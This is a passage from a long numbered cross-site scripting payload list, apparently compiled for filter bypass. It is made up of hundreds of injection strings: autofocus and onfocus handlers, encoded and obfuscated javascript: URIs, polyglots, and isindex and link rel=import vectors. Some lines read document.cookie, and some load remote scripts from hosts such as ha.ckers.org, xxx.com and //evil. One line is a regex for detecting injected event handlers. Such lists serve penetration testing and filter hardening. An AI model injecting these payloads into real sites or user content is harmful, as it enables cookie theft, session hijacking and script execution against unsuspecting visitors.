  3366. input1=<script/&in%u2119ut1=>al%u0117rt(‘1’)</script>
  3367. <input autofocus onblur=alert(1)>
  3368. <input autofocus onblur=alert(103)>
  3369. <input/autofocus/onfocus=
  3370. <input autofocus onfocus=alert(1)>
  3371. <input autofocus onfocus=alert(1)>//INJECTX
  3372. <input autofocus onfocus=confirm(1)>
  3373. <input/autofocus/onfocus=setTimeout(URL.slice(-7))//#alert()
  3374. <input formaction=JaVaScript:confirm(document.cookie)>
  3375. Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it.
  3376. <input id=11 name=s value=`aa`onclick=alert(/xss/)>
  3377. <input id=x><input id=x><script>confirm(x)</script>
  3378. <input id=XSS onblur=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
  3379. <input id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
  3380. <input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
  3381. <input name=password value=logic>
  3382. <input name=USERNAME_PARAMETER_NAME value=USERNAME>
  3383. <input name=username value=brute>
  3384. <input onblur=alert(34) autofocus><input autofocus>
  3385. <input onblur=javascript:alert(1) autofocus><input autofocus>
  3386. <input onblur=write(XSS) autofocus><input autofocus>
  3387. <input onclick=popup=1; >
  3388. <input onfocus=alert(1337) </autofocus>
  3389. <input onfocus=”alert(1)” autofocus>
  3390. <input onfocus=alert(33) autofocus>
  3391. <><input onfocus=confirm(0) autofocus <! — 
  3392. <input onfocus=javascript:alert(1) autofocus>
  3393. <input onfocus=popup=1; autofocus=”x”>
  3394. <InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>renwa
  3395. <input onfocus=write(1) autofocus>
  3396. <input onfocus=write(XSS) autofocus>
  3397. <input/onmouseover=”javaSCRIPT&colon;confirm&lpar;1&rpar;”
  3398. <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>
  3399. <INPUT SRC=”javascript:alert(‘XSS’);”>
  3400. <input srcset=x href=x onclick=popup=1; >
  3401. <input style=”behavior: url(xss.txt)”>
  3402. </input/><svg><script>alert(1)//
  3403. </input/”><svg><script>alert(1)//
  3404. <INPUT TYPE=”BUTTON” action=”alert(‘XSS’)”/>
  3405. <INPUT+TYPE=”checkbox”+onDblClick=confirm(XSS)>
  3406. <input type=hidden name=comment>click me!</form>
  3407. <input type=hidden onformchange=confirm(1)/>
  3408. <input type=hidden style=`x:expression(confirm(1))`>
  3409. <input type=hidden style=`x:expression(confirm(4))`>
  3410. <input type=”image” dynid=XSS SRC=”javascript:alert(‘XSS’);”>
  3411. <INPUT TYPE=”image” DYNSRC=”javascript:alert(‘XSS’);”>
  3412. <input type=”image” dynsrc=”javascript:document.vulnerable=true;”>
  3413. <input type=”image” formaction=JaVaScript:alert(0)>
  3414. <Input type = “image” formaction = JaVaScript: alert (0)>
  3415. <INPUT TYPE=”IMAGE” id=XSS SRC=”javascript:alert(‘XSS’);”>
  3416. <INPUT+TYPE=”IMAGE”+SRC=”javascript:alert(1);”>
  3417. <;INPUT TYPE=”;IMAGE”; SRC=”;javascript:alert(‘;XSS’;);”;>;
  3418. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
  3419. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
  3420. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(XSS);”>
  3421. <INPUT TYPE=IMAGE SRC=javascript:alert(XSS);>
  3422. <INPUT TYPE=”IMAGE” SRC=”javascript:confirm(document.location);”>
  3423. <input TYPE=”IMAGE” SRC=”javascript:document.vulnerable=true;”>
  3424. <INPUT TYPE=”IMAGE” SRC=”javascript:javascript:alert(1);”>
  3425. <input/type=”image”/value=””`<span/onmouseover=’confirm(1)’>X`</span>
  3426. <input type=”search” onsearch=”aler\u0074(1)”>
  3427. <input type=”text” name=”a”
  3428. <input type=”text” name=”foo” value=””autofocus/onfocus=alert(1)//”>
  3429. <input type=”text” name=”text”> <input type=”submit” onclick=”waf”>
  3430. <input type=”text” value=``<div/onmouseover=’alert(1)’>X</div>
  3431. <input type=”text” value=`` <div/onmouseover=’alert(1)’>X</div>
  3432. <input type=”text” value=``<div/onmouseover=’confirm(1)’>X</div>
  3433. <input type=”text” value=`` <div/onmouseover=’confirm(1)’>X</div>
  3434. <input type=’text’ value=’jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’></input>
  3435. <input type=”text” value=”jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”></input>
  3436. <input type=text value=jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
  3437. <input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21ha W4p`”/>
  3438. <input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`”/>
  3439. <input type=”text” value=””onfocus=location=’javascript:alert`1`’ autofocus””/>
  3440. <input type=”text” value=””onresize=pompt(1) “>
  3441. <input type=”text” value=””onresize=pompt(1) “> // IE 10 docmode
  3442. <input type=”text” value=””><script>alert(1)//”><script type=”text/javascript”> function x(){ do something }</script>
  3443. <input value:aa/onclick=alert(/xss/)>
  3444. <input value=”${alert(1)}`</script/”>
  3445. <! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
  3446. <! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
  3447. <! — — !><input value=” →<body/onload=`confirm(4)//`”>
  3448. <input value=<><iframe/src=javascript:confirm(1)
  3449. “><input value=<><iframe/src=javascript:confirm(1)
  3450. <input value=”INPUT”>
  3451. <input value=INPUT>
  3452. <input value=””onfocus=alert(9)//”>
  3453. <input value=’’onfocus=alert(9);a=’’>
  3454. <input value=”<script>alert(1)</script>” `/>
  3455. <input value=”><script src=data:%26comma;alert(1)-”>
  3456. <input value=””><script src=data:%26comma;alert(1)-””>
  3457. <input value=”XSStest” type=text>
  3458. <Input value = “XSS” type = text>
  3459. <i onclick=alert(1)>Click here</i>
  3460. <i/onclick=URL=name>
  3461. io.swf?yid=\”));}catch(e){alert(1);}//
  3462. (?i)([\s\”’`;\/0–9\=]+on\w+\s*=)
  3463. i><<script>alert(document.cookie);//<</script>
  3464. i><ScRiPt>alert(document.cookie)</script>
  3465. i.setAttribute(name, follow);
  3466. i.setAttribute(type, hidden);
  3467. ( is html encoded to &#40
  3468. ) is html encoded to &#41
  3469. i><si%2bicript>alert(document.cookie)</script>
  3470. <isindex action=data:text/html, type=image>
  3471. <isindex action=javascript:alert(166) type=submit value=click>
  3472. <isindex action=”javascript:alert(1)” type=image>
  3473. <isindex action=javascript:alert(1) type=image>
  3474. <isindex action=”javascript:alert(1)” type=image> // Firefox, IE
  3475. <isindex action=javascript:alert(1) type=submit value=click> *
  3476. <isindex action=javascript:alert(1) type=submit value=click>
  3477. <isindex action=javascript:alert(1) type=submit value=click>
  3478. <isindex action=javascript:alert(32) type=image>
  3479. <isindex action=”javas&tab;cript:alert(1)” type=image>
  3480. <isindex action=”javas&Tab;cript:alert(1)” type=image>
  3481. <isindex action=”javas&Tab;cript:confirm(1)” type=image>
  3482. “><isindex action=”javas&Tab;cript:confirm(1)” type=image>
  3483. “/><isindex action=”javas&Tab;cript:confirm(1)” type=image>
  3484. <isindex action=”javas&Tab;cript:confirm(document.cookie)” type=image>
  3485. <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
  3486. <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> Google Chrome, IE
  3487. <isindex/**/alt=1+src=renwa:window[‘alert’]/**/(alt)+type=image+onerror=while(true){eval(src)}>
  3488. <isindex/autofocus/onfocus=alert()>
  3489. <isindex formaction=javascript:alert(171) type=submit value=click>
  3490. <isindexformaction=”javascript:alert(1)” type=image>
  3491. <isindexformaction=”javascript:alert(1)” type=image>
  3492. <Isindexformaction = “javascript: alert (1)” type = image>
  3493. <isindex formaction=javascript:alert(1) type=submit value=click> *
  3494. <isindex formaction=javascript:alert(1) type=submit value=click>
  3495. <isindex formaction=javascript:alert(1) type=submit value=click>
  3496. <isindex formaction=javascript:confirm(1)>
  3497. <isindex type=image src=1 onerror=alert(1)>
  3498. <isindex+type=image+src=1+onerror=alert(1)>
  3499. <isindex type=image src=1 onerror=alert(31)>
  3500. <isindex type=image src=1 onerror=alert(XSS)>
  3501. <isindex x=”javascript:” onmouseover=”alert(1)” label=”test”>
  3502. <isindex x=”javascript:” onmouseover=”alert(1)” label=”test”> // Firefox, IE
  3503. <isindex x=”javascript:” onmouseover=”alert(XSS)”>
  3504. i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\’a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\’\s\rc\=\’eeeeeee\’\20\>{
  3505. <i style=x:expression(alert(URL=1))>
  3506. <i/style=x=x/**/(confirm(1))(‘\’)expression\’)>
  3507. <i/style=x=x/**/n(confirm(1))(‘\’)expressio\’)>
  3508. <i\x00mg src=’1' onerror=alert(0) />
  3509. <j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
  3510. <j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
  3511. */<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
  3512. */”<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
  3513. */”<j 1=-alert(9)// onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
  3514. <j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
  3515. */<j-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
  3516. */”<j”-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
  3517. */”<j”-alert(9)<! — onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
  3518. java&#0000000000000000115;cript:name
  3519. java%09script:alert(1)
  3520. java%0ascript:alert(1)
  3521. java%0dscript:alert(1)
  3522. Javas%26%2399;ript:alert(1)
  3523. javas&#99ript:alert(1)
  3524. Javas&#99;ript:alert(1)
  3525. javascr%0d%0aipt%3Aalert.call(this,%20document.domain)
  3526. javascript:/* — 
  3527. javascript:([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?=?+?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
  3528. javascript & # 00058; alert (1)
  3529. javascript&#00058;confirm(1)
  3530. jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e
  3531. javascript&#058;alert(1)
  3532. javascript&#09;:alert(1)
  3533. javascript://%0Aalert(1)
  3534. javascript://%0aalert(1) or javascript://%250aalert(1)
  3535. javascript:1/*click me!*/ + <alert(1)<! — K </alert(1)<! — →
  3536. javascript:1/*click me!*/ + <alert(1)<!V onclick=location=innerHTML%2bouterHTML>
  3537. javascript://%250Aalert(document.cookie)
  3538. javascript://%250Aalert(document.location=”https://google.com",document.location="https://www.facebook.com")
  3539. javascript:’\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
  3540. “javascript:alert(0)”></param></object>
  3541. ?javascript:alert(1)”,
  3542. javas + cript: + -alert(1)
  3543. javas + cript: + ale + rt + ( + 1 + )
  3544. javas + cript: + ale + rt + (1)
  3545. javas + cript:” + “-alert(1)
  3546. javascrip + t:alert(1)
  3547. javascript: + -alert(1)
  3548. javascript:” + “-alert(1)
  3549. javascript:alert(1);
  3550. javascript:alert(1)//
  3551. javascript:alert(1)
  3552. JaVaScRipT: alert (1)
  3553. JaVaScRipT:alert(1)
  3554. JavaSCript:alert(123)
  3555. javascript:alert(1)//INJECTX
  3556. <javascript:alert(1) onclick=location=tagName>click me! <== doesn’t work! So…
  3557. javascript:alert%281%29;
  3558. javascript:alert%281%29
  3559. javascript:alert(document.domain);
  3560. javascript:alert(“hellox worldss”)
  3561. javascript:alert&lpar;1&rpar;
  3562. javascript:alert&lpar;document&period;cookie&rpar; // AsharJaved
  3563. javascript:alert()// →</script></textarea></style></title><a”//’ onclick=alert()//>*/alert()/*
  3564. javascript:alert()//<svg/onload=alert()>’-alert(“-alert()-”)-’
  3565. javascript://anything%0D%0A%0D%0Awindow.alert(1)
  3566. javas + cript:’click me! + #’-alert(1)
  3567. javas + cript:”click me! + #”-alert(1)
  3568. javas + cript:click me! + #-alert(1)
  3569. javascrip + t:’click me! + #’-alert(1)
  3570. javascrip + t:”click me! + #”-alert(1)
  3571. javascrip + t:click me! + #-alert(1)
  3572. javascript + :’click me! + #’-alert(1)
  3573. javascript + :”click me! + #”-alert(1)
  3574. javascript + :click me! + #-alert(1)
  3575. javascript: + /*click me! + #*/alert(1)
  3576. javascript: +click me! + #-alert(1)
  3577. javascript + :”-’click me! + http://..."-'click me</javascript>#’-alert(1)
  3578. javas + cript:-click me! + http://domain/page?p=%3Cjavas%20onclick=location=tagName%2binnerHTML%2bURL%3Ecript:-click me!</javas>#-alert(1)
  3579. javas + cript:”-’click me! + http://domain/page?p=<javas%20onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#’-alert(1)
  3580. javascript:-click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
  3581. javascript:”-’click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
  3582. javascript:/*click me! + <j 1=”*/””-alert(1)<! — K
  3583. javascript:/*click me! + */” + <j 1=”-alert(9)//” …
  3584. javascript:/*click me! + */” + <j”-alert(9)<! — …
  3585. javascript:/*click me! + */ + <x 1= -alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
  3586. javascript:/*click me! + */” + <x 1=” -alert(9)//” onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
  3587. javascript:/*click me! + */ + <x-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
  3588. javascript:/*click me! + */” + <x”-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
  3589. javascript&colon;alert(1)
  3590. javaSCRIPT & colon; alert (1)
  3591. javaSCRIPT&colon;alert(1)
  3592. javaSCRIPT&colon;confirm(1)
  3593. ;})javascript:confirm(0);
  3594. ;javascript:confirm(0);
  3595. “javascript:confirm(0);”,
  3596. javascript:confirm(0);
  3597. javascript:confirm(1)//
  3598. JaVaScRipT:confirm(1)
  3599. JaVAscRIPT:confirm(4)
  3600. javascript:confirm(7)//://svg
  3601. javascript:confirm&lpar�A1&rpar�A
  3602. javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
  3603. javascript:document.cookie=window.prompt(“edit cookie:”,document.cookie);void(0);
  3604. javascript:document.scripts[0].src=’http://127.0.0.1/yy.js';void(0);
  3605. javascript:document.write(“<script src=xxx></script>”)
  3606. javascript:document.write(unescape(‘<script src=”http://www.xxxx.com/x.js"></script>'));
  3607. javascript:%E2%80%A8alert`1`
  3608. javascript:eval(unescape(location.href))
  3609. javascript:HTMLDocument.__proto__.__defineSetter__(“prototype”,function(){try{d.d.d}catch(e){confirm(e.stack)}})
  3610. javascript: + http://domain/page?p=<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
  3611. javascript:- + http://domain/page?p=<javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
  3612. javascript:”-’ + http://domain/page?p=<javascript:"-' onclick=location=tagName%2bURL>click me!#’-alert(1)
  3613. javas + cript: + http://domain/page?p=<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
  3614. javascript: + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
  3615. javascripT://https://google.com%0aalert(1);//https://google.com
  3616. <javascript id=:alert(195) onmouseover=location=tagName%2Bid>00000
  3617. <javascript id=:alert%26%2340;39%26%2341 onmouseover=location=tagName%2Bid>00000
  3618. <javascript id=:alert(38) onmouseover=location=tagName%2Bid>00000
  3619. <javascript id=:alert&#40;193&#41 onmouseover=location=tagName+id>00000
  3620. <javascript id=:alert&lpar;194&rpar; onmouseover=location=tagName+id>00000
  3621. javascript:/* + <j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
  3622. javascript:/* + <j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
  3623. javascript = j&#x00041vascr&#x00069pt
  3624. Javascript = j&#x00041vascr&#x00069pt
  3625. jaVasCript:/*-/*`/*`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>
  3626. jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
  3627. <! — jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e →
  3628. jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
  3629. jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
  3630. <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
  3631. <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>’click me!</javascript:>#’-alert(1)
  3632. <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>click me!</javascript:>#-alert(1)
  3633. <javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
  3634. <javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
  3635. <javascript onclick=alert(tagName)>click me!
  3636. jaVasCript:, oNcliCk=, et al.
  3637. <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
  3638. <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>’click me!#’-alert(1)
  3639. <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>click me!#-alert(1)
  3640. <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
  3641. <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:’click me!#’-alert(9)
  3642. <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:click me!#-alert(9)
  3643. <javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
  3644. <javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
  3645. <javascript:”-’ onclick=location=tagName%2bURL>click me!#’-alert(1)
  3646. <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!
  3647. <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)
  3648. <javascript onclick=location=tagName+innerHTML+location.hash>:’click me!#’-alert(1)
  3649. <javascript onclick=location=tagName+innerHTML+URL>:”-’click me!</javascript>#’-alert(1)
  3650. <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1)
  3651. <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)
  3652. <javascript:”-’ onclick=location=tagName+URL>click me!#’-alert(1)
  3653. javascript:prompt(1)#{“action”:1}
  3654. “javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x”
  3655. /”/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x
  3656. javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x
  3657. javascript:propmpt(1)
  3658. javascript:// →</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
  3659. javascript:/* →]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img — /style=a:expression&#40&#47&#42'/- /*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms- behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
  3660. ‘/(javascript\s*:)/Usi’,
  3661. javascript<TAB>:alert(1)
  3662. javascript://’//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
  3663. javascript://</title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
  3664. javascript://</title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
  3665. javascript://’/</title></style></textarea></script> →<p” onclick=alert()//>*/alert()/*
  3666. javascript:// →</title></style></textarea></script><svg “//’ onclick=alert()//
  3667. javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+//+/onmouseover=1/+/[*/[]/+alert(1)//’>
  3668. javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+/”/+/onmouseover=1/+/[*/[]/+alert(1)//’>
  3669. javascript://</title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
  3670. javascript:\u0061lert(1)
  3671. javascript: \ u0061lert & # x28; 1 ??& # x29
  3672. javascript:\u0061lert&#x28;1&#x29
  3673. (javascript:window.onerror=confirm;throw%20document.cookie)
  3674. javascript&#x3A;alert&lpar;document&period;cookie&rpar;
  3675. javascript&#x3A;confirm&lpar;document&period;cookie&rpar;
  3676. <javas onclick=location=tagName%2binnerHTML%2bURL>cript:-click me!</javas>#-alert(1)
  3677. <javas onclick=location=tagName%2binnerHTML%2bURL>cript:”-’click me!</javas>#’-alert(1)
  3678. <javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
  3679. <javas onclick=location=tagName+innerHTML+URL>cript:”-’click me!</javas>#’-alert(1)
  3680. <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
  3681. javas + script: + ale + rt + (1)
  3682. javas & Tab; cript: \ u0061lert (1);
  3683. javas&Tab;cript:\u0061lert(1);
  3684. java&#x000000000000000073;cript:name
  3685. j&NewLine;a&NewLine;vas&NewLine;cript:confirm(1);
  3686. <j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
  3687. <j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
  3688. <j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
  3689. <j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
  3690. <j onclick=location=innerHTML>javascript%26colon;alert(1)//
  3691. <j onclick=location=innerHTML>javascript&colon;alert(1)//
  3692. <j onclick=location=innerHTML+URL>javascript:”-’click me!</j>#’-alert(1)
  3693. <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
  3694. <j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
  3695. $(‘ jqueryselector’).append(‘some text to append’);
  3696. JSON.parse(‘{“__proto__”:[“a”,1]}’)
  3697. JSP a = val1
  3698. <keygen autofocus onfocus=alert(1)>
  3699. <keygen autofocus onfocus=alert(104)>
  3700. <keygen autofocus onfocus=alert(1)>//INJECTX
  3701. <keygen id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>”>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  3702. “>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  3703. “>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  3704. <kukux onanimationend=alert(34)>
  3705. <kukux style=animation-name:n onanimationend=alert(43)>
  3706. <kukux style=display:block;position:absolute;background-color:red;font-size:999px onmouseenter=alert(document.domain)></kukux>
  3707. l= 0 || ‘str’,m= 0 || ‘sub’,x= 0 || ‘al’,y= 0 || ‘ev’,g= 0 || ‘tion.h’,f= 0 || ‘ash’,k= 0 || ‘loca’,d= (k) + (g) + (f),a
  3708. <label class=”<% confirm(1) %>”>
  3709. language=vbs>test</b>
  3710. <LAYER id=XSS SRC=”http://xxxx.com/scriptlet.html"></LAYER>
  3711. <LAYER SRC=”http://ha.ckers.org/
  3712. <;LAYER SRC=”;http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
  3713. <LAYER SRC=”http://ha.ckers.org/scriptlet.html"></LAYER>
  3714. <Layer+src=”http://localhost">
  3715. <LAYER src=”http://xss.ha.ckers.org/a.js"></layer>
  3716. <LAYER SRC=”http://xss.ha.ckers.org/a.js"></layer>
  3717. <LAYER SRC=”javascript:document.vulnerable=true;”></LAYER>
  3718. <LAYER SRC=”%(scriptlet)s”></LAYER>
  3719. {}let{}={}
  3720. let=[`const`];
  3721. let=[`const`];(_=_=>let+`ructor`)[_`${_=`ale`}`](_+`rt(let)`)``
  3722. let:let{let:[x=1]}=[alert(1)]
  3723. (_=_=>let+`ructor`)
  3724. <limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
  3725. <limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
  3726. <limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
  3727. <limited_xss_point>eval(get(‘http://xxx.com/x'));</limited_xss_point>
  3728. <limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
  3729. <limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
  3730. <limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
  3731. <limited_xss_point>loads(‘http://xxx.com/x');</limited_xss_point>
  3732. <link%20rel=”import”%20href=”?bypass=<script>confirm(document.domain)</script>”>
  3733. <link%20rel=import%20href=http://avlidienbrunn.se/test.php>
  3734. <link%20rel=import%20href=https:html5sec.org/test.swf
  3735. <link href=”http://host/xss.css">
  3736. <link href=”javascript:alert(1)” rel=”next”>
  3737. <link+id=p1+rel=import+href=/dom/sinks.html>&name=<img/src/onerror=alert(1)>
  3738. <link rel=”import”
  3739. <link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
  3740. <link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(18)’)()}}
  3741. <link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! — 
  3742. <link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! — alert(21)// →</svg><script>0</script>
  3743. <link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(19)</script></form>
  3744. <link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(1)</script></form>
  3745. <link rel=import href=”/bypass/path/<script>alert(16)</script>”>
  3746. <link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>
  3747. <link rel=import href=/bypass/underscore.html><script id=template>//<%alert`20`%></script>
  3748. <link rel=import href=/bypass/usercontent/icon.jpg>
  3749. <link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor(‘alert(1)’)()}}
  3750. <link rel=import href=”data:,%%0D3Cscript>alert(68)%%0D3C%%0D2Fscript>
  3751. <link rel=import href=data:text/html;base64,PHNjcmlwdD5wb3B1cD0xOzwvc2NyaXB0Pg==>
  3752. <link rel=import href=”data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
  3753. <link rel=import href=”data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
  3754. “><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
  3755. <link rel=”import” href=”data:text/html&comma;&lt;script&gt;alert(document.domain)&lt ;&sol;script&gt;
  3756. <link rel=import href=”data:text/html,<script>alert(1)</script>
  3757. “><link rel=import href=data:text/html,<script>alert(1)</script>
  3758. <link rel=”import” href=”data:x,<script>alert(1)</script>
  3759. <link rel=import href=//evil>
  3760. <link rel=import href=/%http://0d-z.exeye.io >
  3761. <link rel=import href=/upload/…..>
  3762. <link rel=”import” href=”//xss.cx”>
  3763. <link rel=import onerror=confirm(1)>
  3764. <link/rel=prefetch&#10import
  3765. <link/rel=prefetch&#10import href=data:q;base64,PHNjcmlwdD5hbGVydCgnQHFhYicpPC9zY3JpcHQ+>
  3766. <link/rel=prefetch&#10import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
  3767. <link rel=”prefetch” href=”http://xss.cx">
  3768. <link/rel=prefetchimport href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
